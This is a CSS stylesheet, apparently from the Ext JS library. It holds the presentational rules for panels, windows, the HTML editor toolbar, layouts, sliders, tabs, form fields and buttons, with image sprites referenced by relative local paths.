.x-tool-print-over {
background-position:-15px -315px;
}
.x-tool-expand {
background-position:0 -330px;
}
.x-tool-expand-over {
background-position:-15px -330px;
}
.x-tool-collapse {
background-position:0 -345px;
}
.x-tool-collapse-over {
background-position:-15px -345px;
}
.x-tool-resize {
background-position:0 -360px;
}
.x-tool-resize-over {
background-position:-15px -360px;
}
.x-tool-move {
background-position:0 -375px;
}
.x-tool-move-over {
background-position:-15px -375px;
}
/* Ghosting */
.x-panel-ghost {
z-index:12000;
overflow:hidden;
position:absolute;
left:0;top:0;
opacity:.65;
-moz-opacity:.65;
filter:alpha(opacity=65);
}
.x-panel-ghost ul {
margin:0;
padding:0;
overflow:hidden;
font-size:0;
line-height:0;
border:1px solid;
border-top:0 none;
display:block;
}
.x-panel-ghost * {
cursor:move !important;
}
.x-panel-dd-spacer {
border:2px dashed;
}
/* Buttons */
.x-panel-btns {
padding:5px;
overflow:hidden;
}
.x-panel-btns td.x-toolbar-cell{
padding:3px;
}
.x-panel-btns .x-btn-focus .x-btn-left{
background-position:0 -147px;
}
.x-panel-btns .x-btn-focus .x-btn-right{
background-position:0 -168px;
}
.x-panel-btns .x-btn-focus .x-btn-center{
background-position:0 -189px;
}
.x-panel-btns .x-btn-over .x-btn-left{
background-position:0 -63px;
}
.x-panel-btns .x-btn-over .x-btn-right{
background-position:0 -84px;
}
.x-panel-btns .x-btn-over .x-btn-center{
background-position:0 -105px;
}
.x-panel-btns .x-btn-click .x-btn-center{
background-position:0 -126px;
}
.x-panel-btns .x-btn-click .x-btn-right{
background-position:0 -84px;
}
.x-panel-btns .x-btn-click .x-btn-left{
background-position:0 -63px;
}
.x-panel-fbar td,.x-panel-fbar span,.x-panel-fbar input,.x-panel-fbar div,.x-panel-fbar select,.x-panel-fbar label{
white-space: nowrap;
}
/**
* W3C Suggested Default style sheet for HTML 4
* http://www.w3.org/TR/CSS21/sample.html
*
* Resets for Ext.Panel @cfg normal: true
*/
.x-panel-reset .x-panel-body html,
.x-panel-reset .x-panel-body address,
.x-panel-reset .x-panel-body blockquote,
.x-panel-reset .x-panel-body body,
.x-panel-reset .x-panel-body dd,
.x-panel-reset .x-panel-body div,
.x-panel-reset .x-panel-body dl,
.x-panel-reset .x-panel-body dt,
.x-panel-reset .x-panel-body fieldset,
.x-panel-reset .x-panel-body form,
.x-panel-reset .x-panel-body frame, frameset,
.x-panel-reset .x-panel-body h1,
.x-panel-reset .x-panel-body h2,
.x-panel-reset .x-panel-body h3,
.x-panel-reset .x-panel-body h4,
.x-panel-reset .x-panel-body h5,
.x-panel-reset .x-panel-body h6,
.x-panel-reset .x-panel-body noframes,
.x-panel-reset .x-panel-body ol,
.x-panel-reset .x-panel-body p,
.x-panel-reset .x-panel-body ul,
.x-panel-reset .x-panel-body center,
.x-panel-reset .x-panel-body dir,
.x-panel-reset .x-panel-body hr,
.x-panel-reset .x-panel-body menu,
.x-panel-reset .x-panel-body pre { display: block }
.x-panel-reset .x-panel-body li { display: list-item }
.x-panel-reset .x-panel-body head { display: none }
.x-panel-reset .x-panel-body table { display: table }
.x-panel-reset .x-panel-body tr { display: table-row }
.x-panel-reset .x-panel-body thead { display: table-header-group }
.x-panel-reset .x-panel-body tbody { display: table-row-group }
.x-panel-reset .x-panel-body tfoot { display: table-footer-group }
.x-panel-reset .x-panel-body col { display: table-column }
.x-panel-reset .x-panel-body colgroup { display: table-column-group }
.x-panel-reset .x-panel-body td,
.x-panel-reset .x-panel-body th { display: table-cell }
.x-panel-reset .x-panel-body caption { display: table-caption }
.x-panel-reset .x-panel-body th { font-weight: bolder; text-align: center }
.x-panel-reset .x-panel-body caption { text-align: center }
.x-panel-reset .x-panel-body body { margin: 8px }
.x-panel-reset .x-panel-body h1 { font-size: 2em; margin: .67em 0 }
.x-panel-reset .x-panel-body h2 { font-size: 1.5em; margin: .75em 0 }
.x-panel-reset .x-panel-body h3 { font-size: 1.17em; margin: .83em 0 }
.x-panel-reset .x-panel-body h4,
.x-panel-reset .x-panel-body p,
.x-panel-reset .x-panel-body blockquote,
.x-panel-reset .x-panel-body ul,
.x-panel-reset .x-panel-body fieldset,
.x-panel-reset .x-panel-body form,
.x-panel-reset .x-panel-body ol,
.x-panel-reset .x-panel-body dl,
.x-panel-reset .x-panel-body dir,
.x-panel-reset .x-panel-body menu { margin: 1.12em 0 }
.x-panel-reset .x-panel-body h5 { font-size: .83em; margin: 1.5em 0 }
.x-panel-reset .x-panel-body h6 { font-size: .75em; margin: 1.67em 0 }
.x-panel-reset .x-panel-body h1,
.x-panel-reset .x-panel-body h2,
.x-panel-reset .x-panel-body h3,
.x-panel-reset .x-panel-body h4,
.x-panel-reset .x-panel-body h5,
.x-panel-reset .x-panel-body h6,
.x-panel-reset .x-panel-body b,
.x-panel-reset .x-panel-body strong { font-weight: bolder }
.x-panel-reset .x-panel-body blockquote { margin-left: 40px; margin-right: 40px }
.x-panel-reset .x-panel-body i,
.x-panel-reset .x-panel-body cite,
.x-panel-reset .x-panel-body em,
.x-panel-reset .x-panel-body var,
.x-panel-reset .x-panel-body address { font-style: italic }
.x-panel-reset .x-panel-body pre,
.x-panel-reset .x-panel-body tt,
.x-panel-reset .x-panel-body code,
.x-panel-reset .x-panel-body kbd,
.x-panel-reset .x-panel-body samp { font-family: monospace }
.x-panel-reset .x-panel-body pre { white-space: pre }
.x-panel-reset .x-panel-body button,
.x-panel-reset .x-panel-body textarea,
.x-panel-reset .x-panel-body input,
.x-panel-reset .x-panel-body select { display: inline-block }
.x-panel-reset .x-panel-body big { font-size: 1.17em }
.x-panel-reset .x-panel-body small,
.x-panel-reset .x-panel-body sub,
.x-panel-reset .x-panel-body sup { font-size: .83em }
.x-panel-reset .x-panel-body sub { vertical-align: sub }
.x-panel-reset .x-panel-body sup { vertical-align: super }
.x-panel-reset .x-panel-body table { border-spacing: 2px; }
.x-panel-reset .x-panel-body thead,
.x-panel-reset .x-panel-body tbody,
.x-panel-reset .x-panel-body tfoot { vertical-align: middle }
.x-panel-reset .x-panel-body td,
.x-panel-reset .x-panel-body th { vertical-align: inherit }
.x-panel-reset .x-panel-body s,
.x-panel-reset .x-panel-body strike,
.x-panel-reset .x-panel-body del { text-decoration: line-through }
.x-panel-reset .x-panel-body hr { border: 1px inset }
.x-panel-reset .x-panel-body ol,
.x-panel-reset .x-panel-body ul,
.x-panel-reset .x-panel-body dir,
.x-panel-reset .x-panel-body menu,
.x-panel-reset .x-panel-body dd { margin-left: 40px }
.x-panel-reset .x-panel-body ul, .x-panel-reset .x-panel-body menu, .x-panel-reset .x-panel-body dir { list-style-type: disc;}
.x-panel-reset .x-panel-body ol { list-style-type: decimal }
.x-panel-reset .x-panel-body ol ul,
.x-panel-reset .x-panel-body ul ol,
.x-panel-reset .x-panel-body ul ul,
.x-panel-reset .x-panel-body ol ol { margin-top: 0; margin-bottom: 0 }
.x-panel-reset .x-panel-body u,
.x-panel-reset .x-panel-body ins { text-decoration: underline }
.x-panel-reset .x-panel-body br:before { content: "\A" }
.x-panel-reset .x-panel-body :before, .x-panel-reset .x-panel-body :after { white-space: pre-line }
.x-panel-reset .x-panel-body center { text-align: center }
.x-panel-reset .x-panel-body :link, .x-panel-reset .x-panel-body :visited { text-decoration: underline }
.x-panel-reset .x-panel-body :focus { outline: invert dotted thin }
/* Begin bidirectionality settings (do not change) */
.x-panel-reset .x-panel-body BDO[DIR="ltr"] { direction: ltr; unicode-bidi: bidi-override }
.x-panel-reset .x-panel-body BDO[DIR="rtl"] { direction: rtl; unicode-bidi: bidi-override }
.x-window {
zoom:1;
}
.x-window .x-window-handle {
opacity:0;
-moz-opacity:0;
filter:alpha(opacity=0);
}
.x-window-proxy {
border:1px solid;
z-index:12000;
overflow:hidden;
position:absolute;
left:0;top:0;
display:none;
opacity:.5;
-moz-opacity:.5;
filter:alpha(opacity=50);
}
.x-window-header {
overflow:hidden;
zoom:1;
}
.x-window-bwrap {
z-index:1;
position:relative;
zoom:1;
left:0;top:0;
}
.x-window-tl .x-window-header {
padding:5px 0 4px 0;
}
.x-window-header-text {
cursor:pointer;
}
.x-window-tc {
background: transparent repeat-x 0 0;
overflow:hidden;
zoom:1;
}
.x-window-tl {
background: transparent no-repeat 0 0;
padding-left:6px;
zoom:1;
z-index:1;
position:relative;
}
.x-window-tr {
background: transparent no-repeat right 0;
padding-right:6px;
}
.x-window-bc {
background: transparent repeat-x 0 bottom;
zoom:1;
}
.x-window-bc .x-window-footer {
padding-bottom:6px;
zoom:1;
font-size:0;
line-height:0;
}
.x-window-bl {
background: transparent no-repeat 0 bottom;
padding-left:6px;
zoom:1;
}
.x-window-br {
background: transparent no-repeat right bottom;
padding-right:6px;
zoom:1;
}
.x-window-mc {
border:1px solid;
padding:0;
margin:0;
}
.x-window-ml {
background: transparent repeat-y 0 0;
padding-left:6px;
zoom:1;
}
.x-window-mr {
background: transparent repeat-y right 0;
padding-right:6px;
zoom:1;
}
.x-window-body {
overflow:hidden;
}
.x-window-bwrap {
overflow:hidden;
}
.x-window-maximized .x-window-bl, .x-window-maximized .x-window-br,
.x-window-maximized .x-window-ml, .x-window-maximized .x-window-mr,
.x-window-maximized .x-window-tl, .x-window-maximized .x-window-tr {
padding:0;
}
.x-window-maximized .x-window-footer {
padding-bottom:0;
}
.x-window-maximized .x-window-tc {
padding-left:3px;
padding-right:3px;
}
.x-window-maximized .x-window-mc {
border-left:0 none;
border-right:0 none;
}
.x-window-tbar .x-toolbar, .x-window-bbar .x-toolbar {
border-left:0 none;
border-right: 0 none;
}
.x-window-bbar .x-toolbar {
border-top:1px solid;
border-bottom:0 none;
}
.x-window-draggable, .x-window-draggable .x-window-header-text {
cursor:move;
}
.x-window-maximized .x-window-draggable, .x-window-maximized .x-window-draggable .x-window-header-text {
cursor:default;
}
.x-window-body {
background-color:transparent;
}
.x-panel-ghost .x-window-tl {
border-bottom:1px solid;
}
.x-panel-collapsed .x-window-tl {
border-bottom:1px solid;
}
.x-window-maximized-ct {
overflow:hidden;
}
.x-window-maximized .x-window-handle {
display:none;
}
.x-window-sizing-ghost ul {
border:0 none !important;
}
.x-dlg-focus{
-moz-outline:0 none;
outline:0 none;
width:0;
height:0;
overflow:hidden;
position:absolute;
top:0;
left:0;
}
.ext-webkit .x-dlg-focus{
width: 1px;
height: 1px;
}
.x-dlg-mask{
z-index:10000;
display:none;
position:absolute;
top:0;
left:0;
-moz-opacity: 0.5;
opacity:.50;
filter: alpha(opacity=50);
}
body.ext-ie6.x-body-masked select {
visibility:hidden;
}
body.ext-ie6.x-body-masked .x-window select {
visibility:visible;
}
.x-window-plain .x-window-mc {
border: 1px solid;
}
.x-window-plain .x-window-body {
border: 1px solid;
background:transparent !important;
}.x-html-editor-wrap {
border:1px solid;
}
.x-html-editor-tb .x-btn-text {
background:transparent no-repeat;
}
.x-html-editor-tb .x-edit-bold, .x-menu-item img.x-edit-bold {
background-position:0 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-italic, .x-menu-item img.x-edit-italic {
background-position:-16px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-underline, .x-menu-item img.x-edit-underline {
background-position:-32px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-forecolor, .x-menu-item img.x-edit-forecolor {
background-position:-160px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-backcolor, .x-menu-item img.x-edit-backcolor {
background-position:-176px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-justifyleft, .x-menu-item img.x-edit-justifyleft {
background-position:-112px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-justifycenter, .x-menu-item img.x-edit-justifycenter {
background-position:-128px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-justifyright, .x-menu-item img.x-edit-justifyright {
background-position:-144px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-insertorderedlist, .x-menu-item img.x-edit-insertorderedlist {
background-position:-80px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-insertunorderedlist, .x-menu-item img.x-edit-insertunorderedlist {
background-position:-96px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-increasefontsize, .x-menu-item img.x-edit-increasefontsize {
background-position:-48px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-decreasefontsize, .x-menu-item img.x-edit-decreasefontsize {
background-position:-64px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-sourceedit, .x-menu-item img.x-edit-sourceedit {
background-position:-192px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tb .x-edit-createlink, .x-menu-item img.x-edit-createlink {
background-position:-208px 0;
background-image:url(../images/default/editor/tb-sprite.gif);
}
.x-html-editor-tip .x-tip-bd .x-tip-bd-inner {
padding:5px;
padding-bottom:1px;
}
.x-html-editor-tb .x-toolbar {
position:static !important;
}.x-panel-noborder .x-panel-body-noborder {
border-width:0;
}
.x-panel-noborder .x-panel-header-noborder {
border-width:0 0 1px;
border-style:solid;
}
.x-panel-noborder .x-panel-tbar-noborder .x-toolbar {
border-width:0 0 1px;
border-style:solid;
}
.x-panel-noborder .x-panel-bbar-noborder .x-toolbar {
border-width:1px 0 0 0;
border-style:solid;
}
.x-window-noborder .x-window-mc {
border-width:0;
}
.x-window-plain .x-window-body-noborder {
border-width:0;
}
.x-tab-panel-noborder .x-tab-panel-body-noborder {
border-width:0;
}
.x-tab-panel-noborder .x-tab-panel-header-noborder {
border-width: 0 0 1px 0;
}
.x-tab-panel-noborder .x-tab-panel-footer-noborder {
border-width: 1px 0 0 0;
}
.x-tab-panel-bbar-noborder .x-toolbar {
border-width: 1px 0 0 0;
border-style:solid;
}
.x-tab-panel-tbar-noborder .x-toolbar {
border-width:0 0 1px;
border-style:solid;
}.x-border-layout-ct {
position: relative;
}
.x-border-panel {
position:absolute;
left:0;
top:0;
}
.x-tool-collapse-south {
background-position:0 -195px;
}
.x-tool-collapse-south-over {
background-position:-15px -195px;
}
.x-tool-collapse-north {
background-position:0 -210px;
}
.x-tool-collapse-north-over {
background-position:-15px -210px;
}
.x-tool-collapse-west {
background-position:0 -180px;
}
.x-tool-collapse-west-over {
background-position:-15px -180px;
}
.x-tool-collapse-east {
background-position:0 -165px;
}
.x-tool-collapse-east-over {
background-position:-15px -165px;
}
.x-tool-expand-south {
background-position:0 -210px;
}
.x-tool-expand-south-over {
background-position:-15px -210px;
}
.x-tool-expand-north {
background-position:0 -195px;
}
.x-tool-expand-north-over {
background-position:-15px -195px;
}
.x-tool-expand-west {
background-position:0 -165px;
}
.x-tool-expand-west-over {
background-position:-15px -165px;
}
.x-tool-expand-east {
background-position:0 -180px;
}
.x-tool-expand-east-over {
background-position:-15px -180px;
}
.x-tool-expand-north, .x-tool-expand-south {
float:right;
margin:3px;
}
.x-tool-expand-east, .x-tool-expand-west {
float:none;
margin:3px 2px;
}
.x-accordion-hd .x-tool-toggle {
background-position:0 -255px;
}
.x-accordion-hd .x-tool-toggle-over {
background-position:-15px -255px;
}
.x-panel-collapsed .x-accordion-hd .x-tool-toggle {
background-position:0 -240px;
}
.x-panel-collapsed .x-accordion-hd .x-tool-toggle-over {
background-position:-15px -240px;
}
.x-accordion-hd {
padding-top:4px;
padding-bottom:3px;
border-top:0 none;
background: transparent repeat-x 0 -9px;
}
.x-layout-collapsed{
position:absolute;
left:-10000px;
top:-10000px;
visibility:hidden;
width:20px;
height:20px;
overflow:hidden;
border:1px solid;
z-index:20;
}
.ext-border-box .x-layout-collapsed{
width:22px;
height:22px;
}
.x-layout-collapsed-over{
cursor:pointer;
}
.x-layout-collapsed-west .x-layout-collapsed-tools, .x-layout-collapsed-east .x-layout-collapsed-tools{
position:absolute;
top:0;
left:0;
width:20px;
height:20px;
}
.x-layout-split{
position:absolute;
height:5px;
width:5px;
line-height:1px;
font-size:1px;
z-index:3;
background-color:transparent;
}
/* IE6 strict won't drag w/out a color */
.ext-strict .ext-ie6 .x-layout-split{
background-color: #fff !important;
filter: alpha(opacity=1);
}
.x-layout-split-h{
background-image:url(../images/default/s.gif);
background-position: left;
}
.x-layout-split-v{
background-image:url(../images/default/s.gif);
background-position: top;
}
.x-column-layout-ct {
overflow:hidden;
zoom:1;
}
.x-column {
float:left;
padding:0;
margin:0;
overflow:hidden;
zoom:1;
}
.x-column-inner {
overflow:hidden;
zoom:1;
}
/* mini mode */
.x-layout-mini {
position:absolute;
top:0;
left:0;
display:block;
width:5px;
height:35px;
cursor:pointer;
opacity:.5;
-moz-opacity:.5;
filter:alpha(opacity=50);
}
.x-layout-mini-over, .x-layout-collapsed-over .x-layout-mini{
opacity:1;
-moz-opacity:1;
filter:none;
}
.x-layout-split-west .x-layout-mini {
top:48%;
}
.x-layout-split-east .x-layout-mini {
top:48%;
}
.x-layout-split-north .x-layout-mini {
left:48%;
height:5px;
width:35px;
}
.x-layout-split-south .x-layout-mini {
left:48%;
height:5px;
width:35px;
}
.x-layout-cmini-west .x-layout-mini {
top:48%;
}
.x-layout-cmini-east .x-layout-mini {
top:48%;
}
.x-layout-cmini-north .x-layout-mini {
left:48%;
height:5px;
width:35px;
}
.x-layout-cmini-south .x-layout-mini {
left:48%;
height:5px;
width:35px;
}
.x-layout-cmini-west, .x-layout-cmini-east {
border:0 none;
width:5px !important;
padding:0;
background-color:transparent;
}
.x-layout-cmini-north, .x-layout-cmini-south {
border:0 none;
height:5px !important;
padding:0;
background-color:transparent;
}
.x-viewport, .x-viewport body {
margin: 0;
padding: 0;
border: 0 none;
overflow: hidden;
height: 100%;
}
.x-abs-layout-item {
position:absolute;
left:0;
top:0;
}
.ext-ie input.x-abs-layout-item, .ext-ie textarea.x-abs-layout-item {
margin:0;
}
.x-box-layout-ct {
overflow:hidden;
zoom:1;
}
.x-box-inner {
overflow:hidden;
zoom:1;
position:relative;
left:0;
top:0;
}
.x-box-item {
position:absolute;
left:0;
top:0;
}.x-progress-wrap {
border:1px solid;
overflow:hidden;
}
.x-progress-inner {
height:18px;
background:repeat-x;
position:relative;
}
.x-progress-bar {
height:18px;
float:left;
width:0;
background: repeat-x left center;
border-top:1px solid;
border-bottom:1px solid;
border-right:1px solid;
}
.x-progress-text {
padding:1px 5px;
overflow:hidden;
position:absolute;
left:0;
text-align:center;
}
.x-progress-text-back {
line-height:16px;
}
.ext-ie .x-progress-text-back {
line-height:15px;
}
.ext-strict .ext-ie7 .x-progress-text-back{
width: 100%;
}
.x-list-header{
background: repeat-x 0 bottom;
cursor:default;
zoom:1;
height:22px;
}
.x-list-header-inner div {
display:block;
float:left;
overflow:hidden;
-o-text-overflow: ellipsis;
text-overflow: ellipsis;
white-space: nowrap;
}
.x-list-header-inner div em {
display:block;
border-left:1px solid;
padding:4px 4px;
overflow:hidden;
-moz-user-select: none;
-khtml-user-select: none;
line-height:14px;
}
.x-list-body {
overflow:auto;
overflow-x:hidden;
overflow-y:auto;
zoom:1;
float: left;
width: 100%;
}
.x-list-body dl {
zoom:1;
}
.x-list-body dt {
display:block;
float:left;
overflow:hidden;
-o-text-overflow: ellipsis;
text-overflow: ellipsis;
white-space: nowrap;
cursor:pointer;
zoom:1;
}
.x-list-body dt em {
display:block;
padding:3px 4px;
overflow:hidden;
-moz-user-select: none;
-khtml-user-select: none;
}
.x-list-resizer {
border-left:1px solid;
border-right:1px solid;
position:absolute;
left:0;
top:0;
}
.x-list-header-inner em.sort-asc {
background: transparent no-repeat center 0;
border-style:solid;
border-width: 0 1px 1px;
padding-bottom:3px;
}
.x-list-header-inner em.sort-desc {
background: transparent no-repeat center -23px;
border-style:solid;
border-width: 0 1px 1px;
padding-bottom:3px;
}
/* Shared styles */
.x-slider {
zoom:1;
}
.x-slider-inner {
position:relative;
left:0;
top:0;
overflow:visible;
zoom:1;
}
.x-slider-focus {
position:absolute;
left:0;
top:0;
width:1px;
height:1px;
line-height:1px;
font-size:1px;
-moz-outline:0 none;
outline:0 none;
-moz-user-select: none;
-khtml-user-select:none;
-webkit-user-select:ignore;
display:block;
overflow:hidden;
}
/* Horizontal styles */
.x-slider-horz {
padding-left:7px;
background:transparent no-repeat 0 -22px;
}
.x-slider-horz .x-slider-end {
padding-right:7px;
zoom:1;
background:transparent no-repeat right -44px;
}
.x-slider-horz .x-slider-inner {
background:transparent repeat-x 0 0;
height:22px;
}
.x-slider-horz .x-slider-thumb {
width:14px;
height:15px;
position:absolute;
left:0;
top:3px;
background:transparent no-repeat 0 0;
}
.x-slider-horz .x-slider-thumb-over {
background-position: -14px -15px;
}
.x-slider-horz .x-slider-thumb-drag {
background-position: -28px -30px;
}
/* Vertical styles */
.x-slider-vert {
padding-top:7px;
background:transparent no-repeat -44px 0;
width:22px;
}
.x-slider-vert .x-slider-end {
padding-bottom:7px;
zoom:1;
background:transparent no-repeat -22px bottom;
}
.x-slider-vert .x-slider-inner {
background:transparent repeat-y 0 0;
}
.x-slider-vert .x-slider-thumb {
width:15px;
height:14px;
position:absolute;
left:3px;
bottom:0;
background:transparent no-repeat 0 0;
}
.x-slider-vert .x-slider-thumb-over {
background-position: -15px -14px;
}
.x-slider-vert .x-slider-thumb-drag {
background-position: -30px -28px;
}.x-window-dlg .x-window-body {
border:0 none !important;
padding:5px 10px;
overflow:hidden !important;
}
.x-window-dlg .x-window-mc {
border:0 none !important;
}
.x-window-dlg .ext-mb-input {
margin-top:4px;
width:95%;
}
.x-window-dlg .ext-mb-textarea {
margin-top:4px;
}
.x-window-dlg .x-progress-wrap {
margin-top:4px;
}
.ext-ie .x-window-dlg .x-progress-wrap {
margin-top:6px;
}
.x-window-dlg .x-msg-box-wait {
background:transparent no-repeat left;
display:block;
width:300px;
padding-left:18px;
line-height:18px;
}
.x-window-dlg .ext-mb-icon {
float:left;
width:47px;
height:32px;
}
.x-window-dlg .x-dlg-icon .ext-mb-content{
zoom: 1;
margin-left: 47px;
}
.x-window-dlg .ext-mb-info, .x-window-dlg .ext-mb-warning, .x-window-dlg .ext-mb-question, .x-window-dlg .ext-mb-error {
background:transparent no-repeat top left;
}
.ext-gecko2 .ext-mb-fix-cursor {
overflow:auto;
}.ext-el-mask {
background-color: #ccc;
}
.ext-el-mask-msg {
border-color:#6593cf;
background-color:#c3daf9;
background-image:url(../images/default/box/tb-blue.gif);
}
.ext-el-mask-msg div {
background-color: #eee;
border-color:#a3bad9;
color:#222;
font:normal 11px tahoma, arial, helvetica, sans-serif;
}
.x-mask-loading div {
background-color:#fbfbfb;
background-image:url(../images/default/grid/loading.gif);
}
.x-item-disabled {
color: gray;
}
.x-item-disabled * {
color: gray !important;
}
.x-splitbar-proxy {
background-color: #aaa;
}
.x-color-palette a {
border-color:#fff;
}
.x-color-palette a:hover, .x-color-palette a.x-color-palette-sel {
border-color:#8bb8f3;
background-color: #deecfd;
}
/*
.x-color-palette em:hover, .x-color-palette span:hover{
background-color: #deecfd;
}
*/
.x-color-palette em {
border-color:#aca899;
}
.x-ie-shadow {
background-color:#777;
}
.x-shadow .xsmc {
background-image: url(../images/default/shadow-c.png);
}
.x-shadow .xsml, .x-shadow .xsmr {
background-image: url(../images/default/shadow-lr.png);
}
.x-shadow .xstl, .x-shadow .xstc, .x-shadow .xstr, .x-shadow .xsbl, .x-shadow .xsbc, .x-shadow .xsbr{
background-image: url(../images/default/shadow.png);
}
.loading-indicator {
font-size: 11px;
background-image: url(../images/default/grid/loading.gif);
}
.x-spotlight {
background-color: #ccc;
}
.x-tab-panel-header, .x-tab-panel-footer {
background-color: #deecfd;
border-color:#8db2e3;
overflow:hidden;
zoom:1;
}
.x-tab-panel-header, .x-tab-panel-footer {
border-color:#8db2e3;
}
ul.x-tab-strip-top{
background-color:#cedff5;
background-image: url(../images/default/tabs/tab-strip-bg.gif);
border-bottom-color:#8db2e3;
}
ul.x-tab-strip-bottom{
background-color:#cedff5;
background-image: url(../images/default/tabs/tab-strip-btm-bg.gif);
border-top-color:#8db2e3;
}
.x-tab-panel-header-plain .x-tab-strip-spacer,
.x-tab-panel-footer-plain .x-tab-strip-spacer {
border-color:#8db2e3;
background-color: #deecfd;
}
.x-tab-strip span.x-tab-strip-text {
font:normal 11px tahoma,arial,helvetica;
color:#416aa3;
}
.x-tab-strip-over span.x-tab-strip-text {
color:#15428b;
}
.x-tab-strip-active span.x-tab-strip-text {
color:#15428b;
font-weight:bold;
}
.x-tab-strip-disabled .x-tabs-text {
color:#aaaaaa;
}
.x-tab-strip-top .x-tab-right, .x-tab-strip-top .x-tab-left, .x-tab-strip-top .x-tab-strip-inner{
background-image: url(../images/default/tabs/tabs-sprite.gif);
}
.x-tab-strip-bottom .x-tab-right {
background-image: url(../images/default/tabs/tab-btm-inactive-right-bg.gif);
}
.x-tab-strip-bottom .x-tab-left {
background-image: url(../images/default/tabs/tab-btm-inactive-left-bg.gif);
}
.x-tab-strip-bottom .x-tab-strip-over .x-tab-right {
background-image: url(../images/default/tabs/tab-btm-over-right-bg.gif);
}
.x-tab-strip-bottom .x-tab-strip-over .x-tab-left {
background-image: url(../images/default/tabs/tab-btm-over-left-bg.gif);
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-right {
background-image: url(../images/default/tabs/tab-btm-right-bg.gif);
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-left {
background-image: url(../images/default/tabs/tab-btm-left-bg.gif);
}
.x-tab-strip .x-tab-strip-closable a.x-tab-strip-close {
background-image:url(../images/default/tabs/tab-close.gif);
}
.x-tab-strip .x-tab-strip-closable a.x-tab-strip-close:hover{
background-image:url(../images/default/tabs/tab-close.gif);
}
.x-tab-panel-body {
border-color:#8db2e3;
background-color:#fff;
}
.x-tab-panel-body-top {
border-top: 0 none;
}
.x-tab-panel-body-bottom {
border-bottom: 0 none;
}
.x-tab-scroller-left {
background-image:url(../images/default/tabs/scroll-left.gif);
border-bottom-color:#8db2e3;
}
.x-tab-scroller-left-over {
background-position: 0 0;
}
.x-tab-scroller-left-disabled {
background-position: -18px 0;
opacity:.5;
-moz-opacity:.5;
filter:alpha(opacity=50);
cursor:default;
}
.x-tab-scroller-right {
background-image:url(../images/default/tabs/scroll-right.gif);
border-bottom-color:#8db2e3;
}
.x-tab-panel-bbar .x-toolbar, .x-tab-panel-tbar .x-toolbar {
border-color:#99bbe8;
}.x-form-field {
font:normal 12px tahoma, arial, helvetica, sans-serif;
}
.x-form-text, textarea.x-form-field {
background-color:#fff;
background-image:url(../images/default/form/text-bg.gif);
border-color:#b5b8c8;
}
.x-form-select-one {
background-color:#fff;
border-color:#b5b8c8;
}
.x-form-check-group-label {
border-bottom: 1px solid #99bbe8;
color: #15428b;
}
.x-editor .x-form-check-wrap {
background-color:#fff;
}
.x-form-field-wrap .x-form-trigger {
background-image:url(../images/default/form/trigger.gif);
border-bottom-color:#b5b8c8;
}
.x-form-field-wrap .x-form-date-trigger {
background-image: url(../images/default/form/date-trigger.gif);
}
.x-form-field-wrap .x-form-clear-trigger {
background-image: url(../images/default/form/clear-trigger.gif);
}
.x-form-field-wrap .x-form-search-trigger {
background-image: url(../images/default/form/search-trigger.gif);
}
.x-trigger-wrap-focus .x-form-trigger {
border-bottom-color:#7eadd9;
}
.x-item-disabled .x-form-trigger-over {
border-bottom-color:#b5b8c8;
}
.x-item-disabled .x-form-trigger-click {
border-bottom-color:#b5b8c8;
}
.x-form-focus, textarea.x-form-focus {
border-color:#7eadd9;
}
.x-form-invalid, textarea.x-form-invalid {
background-color:#fff;
background-image:url(../images/default/grid/invalid_line.gif);
border-color:#c30;
}
.x-form-invalid.x-form-composite {
border: none;
background-image: none;
}
.x-form-invalid.x-form-composite .x-form-invalid {
background-color:#fff;
background-image:url(../images/default/grid/invalid_line.gif);
border-color:#c30;
}
.x-form-inner-invalid, textarea.x-form-inner-invalid {
background-color:#fff;
background-image:url(../images/default/grid/invalid_line.gif);
}
.x-form-grow-sizer {
font:normal 12px tahoma, arial, helvetica, sans-serif;
}
.x-form-item {
font:normal 12px tahoma, arial, helvetica, sans-serif;
}
.x-form-invalid-msg {
color:#c0272b;
font:normal 11px tahoma, arial, helvetica, sans-serif;
background-image:url(../images/default/shared/warning.gif);
}
.x-form-empty-field {
color:gray;
}
.x-small-editor .x-form-field {
font:normal 11px arial, tahoma, helvetica, sans-serif;
}
.ext-webkit .x-small-editor .x-form-field {
font:normal 11px arial, tahoma, helvetica, sans-serif;
}
.x-form-invalid-icon {
background-image:url(../images/default/form/exclamation.gif);
}
.x-fieldset {
border-color:#b5b8c8;
}
.x-fieldset legend {
font:bold 11px tahoma, arial, helvetica, sans-serif;
color:#15428b;
}
.x-btn{
font:normal 11px tahoma, verdana, helvetica;
}
.x-btn button{
font:normal 11px arial,tahoma,verdana,helvetica;
color:#333;
}
.x-btn em {
font-style:normal;
font-weight:normal;
}
.x-btn-tl, .x-btn-tr, .x-btn-tc, .x-btn-ml, .x-btn-mr, .x-btn-mc, .x-btn-bl, .x-btn-br, .x-btn-bc{
background-image:url(../images/default/button/btn.gif);
}
.x-btn-click .x-btn-text, .x-btn-menu-active .x-btn-text, .x-btn-pressed .x-btn-text{
color:#000;
}
.x-btn-disabled *{
color:gray !important;
}
.x-btn-mc em.x-btn-arrow {
background-image:url(../images/default/button/arrow.gif);
}
.x-btn-mc em.x-btn-split {
background-image:url(../images/default/button/s-arrow.gif);
}
